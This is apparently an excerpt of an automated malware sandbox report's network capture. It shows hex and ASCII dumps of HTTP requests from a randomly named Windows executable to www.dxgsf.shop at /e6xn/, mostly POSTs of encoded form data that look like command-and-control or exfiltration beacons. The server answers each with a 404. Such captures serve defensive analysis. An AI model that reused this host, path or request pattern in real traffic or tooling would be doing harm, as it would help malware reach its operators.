                                                                                  Mar 18, 2024 14:48:42.118328094 CET478INData Raw: 64 29 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b
                                                                                  Data Ascii: d){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not
                                                                                  Mar 18, 2024 14:48:42.118458033 CET1286INData Raw: 61 38 32 0d 0a 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70
                                                                                  Data Ascii: a82le{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaptio
                                                                                  Mar 18, 2024 14:48:42.227731943 CET1286INData Raw: 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 65 34 77 70 2d 73 75 62 73 63 72 69 62 65 20 2e 66 69 72 73 74 4e 61 6d 65 53 75 6d 6d 61 72 79 20 2e 6c 61 73 74 4e 61 6d 65 53 75 6d 6d 61 72 79 7b 74 65 78 74 2d 74 72 61 6e 73
                                                                                  Data Ascii: gin:0 auto}.wp-block-ce4wp-subscribe .firstNameSummary .lastNameSummary{text-transform:capitalize}.wp-block-ce4wp-subscribe .ce4wp-inline-notification{display:flex;flex-direction:row;align-items:center;padding:13px 10px;width:100%;height:40px;


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.1049757103.197.25.241806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:00.929116964 CET745OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.dxgsf.shop
                                                                                  Referer: http://www.dxgsf.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 35 74 67 58 30 6c 34 44 53 71 75 70 4f 6d 65 30 72 41 4e 4f 75 68 6a 65 7a 4d 31 6b 75 72 55 2f 57 39 44 55 4a 6e 31 4a 45 77 39 44 33 38 37 71 67 72 53 54 4a 4c 33 6c 35 59 4c 4c 71 6c 48 72 45 39 61 55 46 74 67 51 49 78 66 37 4e 48 4e 50 45 62 53 56 4a 4c 4b 2b 64 66 7a 4a 51 43 6f 53 65 42 31 66 43 6d 68 64 4e 30 64 35 66 78 78 35 33 67 53 32 33 72 75 4c 74 55 38 71 52 57 6a 77 4c 41 33 73 4f 64 31 6e 41 35 67 75 72 69 65 6e 30 32 34 65 46 77 55 33 30 7a 37 7a 54 57 72 69 6a 38 35 6c 51 31 32 48 71 45 38 6e 31 57 63 47 61 6b 74 4f 61 50 53 63 55 56 49 38
                                                                                  Data Ascii: bvOt=5tgX0l4DSqupOme0rANOuhjezM1kurU/W9DUJn1JEw9D387qgrSTJL3l5YLLqlHrE9aUFtgQIxf7NHNPEbSVJLK+dfzJQCoSeB1fCmhdN0d5fxx53gS23ruLtU8qRWjwLA3sOd1nA5gurien024eFwU30z7zTWrij85lQ12HqE8n1WcGaktOaPScUVI8
                                                                                  Mar 18, 2024 14:49:01.228142977 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:01 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.1049758103.197.25.241806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:03.754472017 CET769OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.dxgsf.shop
                                                                                  Referer: http://www.dxgsf.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 35 74 67 58 30 6c 34 44 53 71 75 70 63 56 57 30 6f 68 4e 4f 2b 78 6a 52 32 4d 31 6b 30 62 55 37 57 39 66 55 4a 69 46 5a 48 43 70 44 77 64 4c 71 68 75 2b 54 4b 4c 33 6c 78 34 4c 43 6b 46 48 61 45 38 6d 6d 46 70 6f 51 49 78 4c 37 4e 47 39 50 44 71 53 4b 4c 62 4b 38 56 2f 7a 4c 50 53 6f 53 65 42 31 66 43 6d 31 7a 4e 30 46 35 66 42 42 35 33 43 36 31 72 37 75 49 6f 6b 38 71 44 6d 6a 30 4c 41 32 4c 4f 66 42 4e 41 37 6f 75 72 6e 69 6e 30 6e 34 66 4d 77 55 31 70 6a 37 74 43 48 58 6e 36 4f 73 63 51 54 36 73 6f 43 6f 51 2f 58 39 42 4c 31 4d 5a 4a 34 4f 53 61 54 39 57 76 33 66 4d 64 33 38 5a 31 38 79 2f 74 47 51 4e 58 35 4f 32 37 77 3d 3d
                                                                                  Data Ascii: bvOt=5tgX0l4DSqupcVW0ohNO+xjR2M1k0bU7W9fUJiFZHCpDwdLqhu+TKL3lx4LCkFHaE8mmFpoQIxL7NG9PDqSKLbK8V/zLPSoSeB1fCm1zN0F5fBB53C61r7uIok8qDmj0LA2LOfBNA7ournin0n4fMwU1pj7tCHXn6OscQT6soCoQ/X9BL1MZJ4OSaT9Wv3fMd38Z18y/tGQNX5O27w==
                                                                                  Mar 18, 2024 14:49:04.059365988 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:03 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.1049759103.197.25.241806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:06.575608015 CET1782OUTPOST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.dxgsf.shop
                                                                                  Referer: http://www.dxgsf.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Raw: 62 76 4f 74 3d 35 74 67 58 30 6c 34 44 53 71 75 70 63 56 57 30 6f 68 4e 4f 2b 78 6a 52 32 4d 31 6b 30 62 55 37 57 39 66 55 4a 69 46 5a 48 43 78 44 77 72 58 71 68 4e 6d 54 4c 4c 33 6c 2f 59 4c 50 6b 46 48 39 45 38 2f 74 46 70 73 6d 49 7a 7a 37 4d 6b 31 50 47 65 2b 4b 43 62 4b 38 58 2f 7a 4f 51 43 70 51 65 42 46 68 43 6d 6c 7a 4e 30 46 35 66 44 4a 35 2b 77 53 31 70 37 75 4c 74 55 38 51 52 57 6a 51 4c 41 76 30 4f 66 46 33 41 4c 49 75 6f 48 53 6e 78 56 67 66 51 67 55 7a 36 54 36 2b 43 48 61 33 36 4f 78 6a 51 54 6d 47 6f 46 6b 51 2b 42 45 75 58 6b 70 42 55 34 53 33 54 46 39 66 6f 48 2f 55 45 45 35 52 36 4e 32 44 35 6e 4e 4f 44 6f 33 6a 70 70 53 73 6c 59 53 73 55 4f 43 68 5a 63 41 57 44 32 43 69 48 75 73 54 2b 6f 75 53 62 69 4d 62 39 59 78 69 6e 48 33 54 4a 73 5a 38 45 35 59 63 61 71 70 35 33 57 5a 79 77 77 69 52 4e 7a 34 70 69 65 70 64 77 37 66 55 35 77 42 51 64 46 4c 74 78 76 4c 64 74 6e 45 67 78 50 34 55 2b 64 2f 43 54 7a 30 34 38 4e 79 2b 58 58 64 32 6b 59 49 37 39 54 35 4e 33 79 75 4b 73 4f 48 31 75 75 4c 6a 73 79 45 43 67 6f 50 34 4a 71 30 59 36 70 35 52 4a 32 66 6d 53 30 61 65 4d 62 44 61 70 30 39 6f 68 6c 52 49 37 79 4f 45 6b 69 6e 53 55 45 7a 6b 69 67 6a 6d 62 4d 48 5a 4c 78 47 70 6a 75 71 45 79 4c 51 78 31 6f 6e 34 51 57 42 42 4b 61 79 6d 67 4a 55 44 71 65 62 36 2b 63 69 56 75 56 33 4f 72 2f 46 52 78 30 69 4b 59 34 41 65 48 38 73 6d 35 30 65 4c 53 72 2b 6f 69 50 47 46 55 63 64 76 41 66 44 49 36 44 57 47 6e 55 70 65 77 2b 2b 4e 78 6e 43 57 45 69 51 75 56 41 53 70 65 78 75 6f 55 42 72 31 55 56 75 71 76 6e 4c 49 68 66 52 54 37 31 2f 57 53 43 44 56 45 77 43 6f 37 2b 65 72 6c 4e 64 4e 72 7a 6a 79 55 46 42 38 67 35 52 76 34 36 64 51 33 6f 66 4e 4e 4c 75 70 7a 2f 52 43 62 70 4a 67 32 51 34 4a 79 53 34 65 47 56 52 62 4f 61 71 50 56 34 57 76 54 48 75 6e 37 4d 5a 61 76 65 33 64 35 4f 78 61 2f 4f 4e 6a 38 46 46 63 45 77 6f 50 36 59 67 39 72 73 71 31 2b 32 43 47 35 51 62 73 54 51 73 41 36 38 70 68 6f 4f 6c 6e 4a 48 6c 35 5a 56 63 67 2f 6b 70 75 46 2f 5a 4f 56 42 77 31 67 67 76 6e 4b 77 4e 34 51 64 77 53 6e 71 53 6d 56 6e 74 62 36 73 6c 5a 43 69 34 73 75 6a 56 4d 2b 2f 2f 56 79 37 43 6d 49 4f 78 45 64 4d 44 34 6f 79 72 68 33 77 75 51 56 53 5a 50 4b 70 46 35 46 41 31 70 4b 48 30 56 51 35 62 72 34 67 74 31 61 6a 73 56 65 64 41 6e 47 30 57 65 5a 4a 39 6c 61 4f 79 66 43 53 49 78 6a 49 35 6a 43 4d 78 41 55 6e 49 45 32 48 6e 6c 67 31 4a 73 34 79 6d 66 52 37 43 7a 6b 45 2b 31 47 79 78 31 32 76 59 2f 32 6b 4c 38 45 70 54 72 6d 74 35 71 78 2f 42 47 44 5a 59 6a 4f 6e 67 56 31 51 4c 36 4b 77 4d 6c 77 54 74 4e 65 51 64 6c 4b 66 78 4e 47 31 50 2b 55 2f 70 65 53 7a 61 69 54 41 7a 70 6a 77 30 47 71 35 33 34 30 4b 33 54 47 6e 70 67 4d 6e 5a 6a 58 41 2b 33 70 35 74 61 41 53 42 33 74 35 54 32 61 43 78 55 63 37 70 52 4d 78 7a 5a 46 51 32 53 75 4d 4f 42 67 65 59 36 31 2b 57 6c 52 36 30 58 78 31 4d 39 56 2b 71 76 30 52 4d 67 72 76 38 6a 45 74 68 53 4c 57 4c 77 4d 78 75 30 74 6a 39 39 67 78 39 64 54 53 6b 4a 6c 4c 56 56 77 78 6a 59 2f 68 34 30 4f 62 5a 6c 74 55 7a 75 66 36 57 37 4e 30 42 6a 55 4d 53 45 38 49 54 48 4a 45 65 77 36 61 4e 39 52 6b 56 4f 78 55 56 7a 52 32 31 73 51 6e 46 41 65 41 33 43 6e 7a 36 6d 4b 6d 46 64 4e 57 46 43 71 4b 77 4a 4e 53 78 56 33 76 37 66 47 6a 47 6c 66 76 54 54 63 68 52 66 6d 6d 54 6e 33 78 41 46 70 48 55 72 47 69 62 4e 64 2b 5a 39 45 6f 46 6d 42 4b 5a 30 35 48 6e 76 48 63 6b 64 55 79 63 64 61 63 72 41 4f 73 4e 54 2b 34 43 53 6f 31 35 4b 65 39 42 71 33 4c 6f 2f 4e 46 50 79 70 62 36 71 4b 44 6e 57 36 7a 68 79 67 39 47 4d 63 6e 47 31 58 72 6b 76 6a 66 61 45 64 56 76 71 49 46 4f 4c 4e 4f 47 34 34 2b 68 6c 37 6c 66 2b 50 49 53 55 57 37 2b 59 4f 61 71 39 64 75 51 71 33 6f 75 2b 55 78 64 2f 62 53 53 35 45 41 5a 68 54 43 59 3d
                                                                                  Data Ascii: bvOt=5tgX0l4DSqupcVW0ohNO+xjR2M1k0bU7W9fUJiFZHCxDwrXqhNmTLL3l/YLPkFH9E8/tFpsmIzz7Mk1PGe+KCbK8X/zOQCpQeBFhCmlzN0F5fDJ5+wS1p7uLtU8QRWjQLAv0OfF3ALIuoHSnxVgfQgUz6T6+CHa36OxjQTmGoFkQ+BEuXkpBU4S3TF9foH/UEE5R6N2D5nNODo3jppSslYSsUOChZcAWD2CiHusT+ouSbiMb9YxinH3TJsZ8E5Ycaqp53WZywwiRNz4piepdw7fU5wBQdFLtxvLdtnEgxP4U+d/CTz048Ny+XXd2kYI79T5N3yuKsOH1uuLjsyECgoP4Jq0Y6p5RJ2fmS0aeMbDap09ohlRI7yOEkinSUEzkigjmbMHZLxGpjuqEyLQx1on4QWBBKaymgJUDqeb6+ciVuV3Or/FRx0iKY4AeH8sm50eLSr+oiPGFUcdvAfDI6DWGnUpew++NxnCWEiQuVASpexuoUBr1UVuqvnLIhfRT71/WSCDVEwCo7+erlNdNrzjyUFB8g5Rv46dQ3ofNNLupz/RCbpJg2Q4JyS4eGVRbOaqPV4WvTHun7MZave3d5Oxa/ONj8FFcEwoP6Yg9rsq1+2CG5QbsTQsA68phoOlnJHl5ZVcg/kpuF/ZOVBw1ggvnKwN4QdwSnqSmVntb6slZCi4sujVM+//Vy7CmIOxEdMD4oyrh3wuQVSZPKpF5FA1pKH0VQ5br4gt1ajsVedAnG0WeZJ9laOyfCSIxjI5jCMxAUnIE2Hnlg1Js4ymfR7CzkE+1Gyx12vY/2kL8EpTrmt5qx/BGDZYjOngV1QL6KwMlwTtNeQdlKfxNG1P+U/peSzaiTAzpjw0Gq5340K3TGnpgMnZjXA+3p5taASB3t5T2aCxUc7pRMxzZFQ2SuMOBgeY61+WlR60Xx1M9V+qv0RMgrv8jEthSLWLwMxu0tj99gx9dTSkJlLVVwxjY/h40ObZltUzuf6W7N0BjUMSE8ITHJEew6aN9RkVOxUVzR21sQnFAeA3Cnz6mKmFdNWFCqKwJNSxV3v7fGjGlfvTTchRfmmTn3xAFpHUrGibNd+Z9EoFmBKZ05HnvHckdUycdacrAOsNT+4CSo15Ke9Bq3Lo/NFPypb6qKDnW6zhyg9GMcnG1XrkvjfaEdVvqIFOLNOG44+hl7lf+PISUW7+YOaq9duQq3ou+Uxd/bSS5EAZhTCY=
                                                                                  Mar 18, 2024 14:49:06.872243881 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:06 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.1049760103.197.25.241806128C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Mar 18, 2024 14:49:09.406210899 CET496OUTGET /e6xn/?bvOt=0vI33Q4NEpmtOF7zniUBuj/B9uVSpeQXctuTHh1MPiMb1OOu6LKWAuvExYXMr2bPJ/7wAe8CJHHvd3UWKZqUB7/Hcv68Qi5JcHFgKGRsF2oedTZ7pw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:49:09.704766989 CET691INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
